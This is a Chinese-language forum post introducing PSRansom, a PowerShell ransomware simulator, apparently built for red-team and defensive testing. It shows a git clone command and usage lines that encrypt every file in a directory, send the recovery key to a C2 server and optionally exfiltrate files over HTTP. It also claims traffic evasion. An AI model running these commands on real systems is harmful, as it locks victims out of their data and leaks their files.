|
介绍
PSRansom 是具有 C2 服务器功能的 PowerShell 勒索软件模拟器。此工具可帮助你在安装了 PowerShell 的任何系统上模拟任何系统中的通用勒索软件的加密过程。借助集成的 C2 服务器,可以通过 HTTP 窃取文件并接收客户端信息。
这两个过程之间的所有通信都经过加密或编码,以便流量检查机制无法检测到,尽管在任何时候都不会使用 HTTPS。
依赖
- PowerShell 4.0 or greater
下载
建议克隆完整的存储库或下载 zip 文件,可以通过运行以下命令来执行此操作:
- git clone https://github.com/JoelGMSec/PSRansom
复制代码
用法
- .\PSRansom -h
- ____ ____ ____
- | _ \/ ___|| _ \ __ _ _ __ ___ ___ _ __ ___
- | |_) \___ \| |_) / _' | '_ \/ __|/ _ \| '_ ' _ \
- | __/ ___) | _ < (_| | | | \__ \ (_) | | | | | |
- |_| |____/|_| \_\__,_|_| |_|___/\___/|_| |_| |_|
- ----------------- by @JoelGMSec ----------------
- Info: This tool helps you simulate encryption process of a
- generic ransomware in PowerShell with C2 capabilities
- Usage: .\PSRansom.ps1 -e Directory -s C2Server -p C2Port
- Encrypt all files & sends recovery key to C2Server
- Use -x to exfiltrate and decrypt files on C2Server
- .\PSRansom.ps1 -d Directory -k RecoveryKey
- Decrypt all files with recovery key string
- Warning: All info will be sent to the C2Server without any encryption
- You need previously generated recovery key to retrieve files
复制代码
详细的使用指南可以在以下链接中找到:https://darkbyte.net/psransom-si ... rico-con-powershell
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有账号?立即注册
x
|